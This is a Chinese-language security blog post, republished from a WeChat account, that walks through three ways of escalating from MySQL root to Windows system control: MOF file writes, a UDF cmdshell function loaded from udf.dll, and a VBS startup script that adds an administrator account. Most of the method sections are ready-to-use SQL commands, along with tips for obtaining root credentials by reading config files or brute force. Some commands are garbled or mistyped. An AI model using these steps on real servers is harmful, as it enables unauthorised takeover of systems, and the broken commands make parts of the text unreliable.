mysql数据库提权

admin 2022年3月27日02:04:22评论110 views字数 1984阅读6分36秒阅读模式

mysql数据库提权

必要条件:

获取MySQL数据库最高权限root的账号密码,写操作不受限

获取方法:

1、查看数据库配置文件

关键字:config、conn、data、sql、inc、database

2、下载MySQL安装路径下的数据文件并破解安装路径下的data目录中

3、进行暴力破解


1

三种提权方式:MOF提权

2

三种提权方式:UDF提权

3

三种提权方式:启动项提权



01

MOF提权


原理:

利用了c:/windows/system32/wbem/mof/目录下的nullevt.mof文件,该文件每分钟都会在一个特定的时间去执行一次的特性,通过写入cmd命令使其被带入执行。


利用条件:

Windows<=2003

对c:/windows/system32/wbem/mof/目录有写权限


提权方法:

1、在可写目录中上传mof文件(当前目录、c:/windows/temp/等等)。

2、执行load_file及into  dumpfile把文件导出到正确的位置。

SELECT  load_file("C:/phpstudy/WWW/add_admin.mof")  into  dumpfile  "C:/WINDOWS/system32/wbem/mof/add_admin.mof"

3、select load_file(“c:/phpstudy/www/”)


02

UDF提权


原理:

1、UDF(User Defined Function)用户自定义函数,支持用户自定义。

2、通过添加新的函数,对MySQL服务器进行功能扩充,从而创建函数,将MySQL账号转化为系统system权限。

3、UDF提权是通过root权限导出udf.dII到系统目录下,可以通过udf.dII调用执行cmd。


利用条件:

1、注意MySQL数据库版本,不同版本操作不一样。

2、MySQL对文件的写入和读取无限制。

mysql数据库提权

步骤:

1、找到udf.dll文件(需要使用高级编程语言封装shellcode/sqlmap/github等等)。

2、将udf.dll文件上传到指定的位置。

mysql数据库提权

mysql数据库提权

如果/lib/plugin目录不存在,可以利用NTFS ADS流来创建文件夹。

mysql数据库提权

3、将udf.dll文件引入到MySQL数据库中。

create  function  cmdshell  returns  string  soname  "udf.dll";注意:函数名cmdshell不是随便写的,需要查看udf.dll中封装的函数名,一般使用winhex等二进制查看器可获取查看是否导入成功 :use  mysql;  select  *  from  mysql.func

4、如果导入成功,则开始使用,使用所需函数一定要看清楚,如函数名确实是cmdshell。

select  cmdshell("whoami")


03

启动项提权


原理:

将一段VBS脚本导入到开机启动项中,如果管理员重启了服务器,那么就会自动调用该脚本,并执行其中的用户添加及提权命令。


利用条件∶

1、上传的目录必须具备可读写的权限。

2、调用的 cmd 也必须有足够的权限,将vbs脚本写到启动项对应的文件夹中。


提权方式∶

MySQL启动项提权

1、直接将VBS 提权脚本上传到启动项目录下

2、利用SQL命令来进行VBS脚本的创建及添加


利用SQL命令来进行VBS脚本的创建步骤:

1、连接到对方MySQL服务器,进入后查看数据库中有哪些数据表

命令:show tables默认的情况下,test中没有任何表的存在。

2、进入test数据库,并创建一个新的表:

create table a(cmd text)//创建了一个新的表,名为a,表中只存放了一个字段,字段名为cmd,为text文本

3、在表中插入内容,用这三条命令来建立一个VBS的脚本程序:

insert into a values("set wshshell=createobject("wscrit.shel");inser into a values("a=wshshellrun("cmd.exe /c net user icq 123.com /add"",0)");insert into a values("b=wshshellrun("cmdexe/c net localgroup administrators icq/add",O)");

4、输出表为一个VBS的脚本文件

select  *  from  ainto  dumpfile"C:Documents  and  SettingsAdministrator「开始」菜单程序启动1.vbs";

5、利用其他手段重启电脑

备注:个人理解,如果有误,感谢指出。

mysql数据库提权

• 往期精选

mysql数据库提权
mysql数据库提权

GoldenEye 靶场渗透测试

CVE-2020-1472漏洞复现

记一次艰难的SQL注入(过安全狗)

干货|sql注入绕WAF的N种姿势

mysql数据库提权

下方点击关注发现更多精彩!

原文始发于微信公众号(银河护卫队super):mysql数据库提权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月27日02:04:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   mysql数据库提权https://cn-sec.com/archives/843383.html

发表评论

匿名网友 填写信息